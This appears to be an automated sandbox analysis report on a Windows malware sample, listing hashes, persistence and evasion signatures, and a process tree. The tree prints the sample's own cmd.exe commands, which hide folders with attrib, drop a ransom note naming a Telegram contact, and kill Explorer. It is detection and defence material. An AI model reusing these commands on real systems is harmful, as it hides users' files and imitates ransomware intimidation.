Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    04/04/2025, 01:01

General

  • Target

    PureLogStealer-0xb.exe

  • Size

    193KB

  • MD5

    98609581725d9cf7f5200dbb02266cd6

  • SHA1

    5f8a127fb69172947c6212b3a466279794b702a4

  • SHA256

    01b57b7ab116a353b5d7d778b62c1a99f7f9f10e6af3a524aa13b9e3a588d751

  • SHA512

    1cfa89386dd206ba5be5a981f4942deb76b71f7dcc5a09f9cf605e87a0128983bce1a8d22300e08e0751321a47c6252575d93fa9d81e847944b2c9fc5aaa2d0d

  • SSDEEP

    6144:pS4OgfnRtcCUsnzUCpM69/KImQi/6ebl:srg/jcy

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Drops desktop.ini file(s) 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • Views/modifies file attributes 1 TTPs 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
    "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:536
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4940
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:5104
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:1168
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:5248
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:3796
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4312
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1688
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:3556
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4192
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1864
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:5828
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4936
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2420
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:2980
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Ooops! Your files are encrypted by the Legion hacker group! Telegram for contact: @xexeza 1>info-Locker.txt & attrib -h +s +r info-Locker.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4996
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:3256
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-Locker.txt
        3⤵
        • Views/modifies file attributes
        PID:4252
    • C:\Windows\SYSTEM32\taskkill.exe
      taskkill.exe /im Explorer.exe /f
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:5012
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" -startup
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5224
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe -startup
      2⤵
      PID:2044
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5200
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      2⤵
      PID:4880
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" --init
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:6104
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe --init
      2⤵
      PID:4708
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" /setup
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5824
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe /setup
      2⤵
      PID:4624
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe" --wininit
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5432
    • C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe
      C:\Users\Admin\AppData\Local\Temp\PureLogStealer-0xb.exe --wininit
      2⤵
      PID:540
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c AWindowsService.exe
    1⤵
    PID:4816
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskhost.exe
    1⤵
    PID:4824
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c windowsx-c.exe
    1⤵
    PID:4844
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c System.exe
    1⤵
    PID:4828
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c _default64.exe
    1⤵
    PID:4888
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c native.exe
    1⤵
    PID:5008
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ux-cryptor.exe
    1⤵
    PID:4764
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c crypt0rsx.exe
    1⤵
    PID:5140

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PureLogStealer-0xb.exe.log

    Filesize
    1KB

    MD5
    2d2a235f1b0f4b608c5910673735494b

    SHA1
    23a63f6529bfdf917886ab8347092238db0423a0

    SHA256
    c897436c82fda9abf08b29fe05c42f4e59900116bbaf8bfd5b85ef3c97ab7884

    SHA512
    10684245497f1a115142d49b85000075eb36f360b59a0501e2f352c9f1d767c447c6c44c53a3fb3699402a15a8017bdbd2edd72d8599fdd4772e9e7cb67f3086

  • C:\Users\Public\Desktop\info-Locker.txt

    Filesize
    101B

    MD5
    08f3476d37aba1a9688406751a7ba732

    SHA1
    3818a248a30bc1344292b5feeb95c3fc38cbcadf

    SHA256
    08eb86f622bc923a02329ea5d3a7eea9781d1178abbd25fb1e8cac0d4babd934

    SHA512
    3df022e5cb9e93c7133c942e5a1cb425a349f2348d74af786a8789acd16b36fb7d95a19b635ff60d7507ad357e853810789dc48e0016a66ab1996af0dbeffc76

  • memory/536-0-0x00007FFD4B4D3000-0x00007FFD4B4D5000-memory.dmp

    Filesize
    8KB

  • memory/536-1-0x0000000000ED0000-0x0000000000F06000-memory.dmp

    Filesize
    216KB

  • memory/536-2-0x00007FFD4B4D0000-0x00007FFD4BF91000-memory.dmp

    Filesize
    10.8MB

  • memory/536-20-0x00007FFD4B4D3000-0x00007FFD4B4D5000-memory.dmp

    Filesize
    8KB

  • memory/536-21-0x00007FFD4B4D0000-0x00007FFD4BF91000-memory.dmp

    Filesize
    10.8MB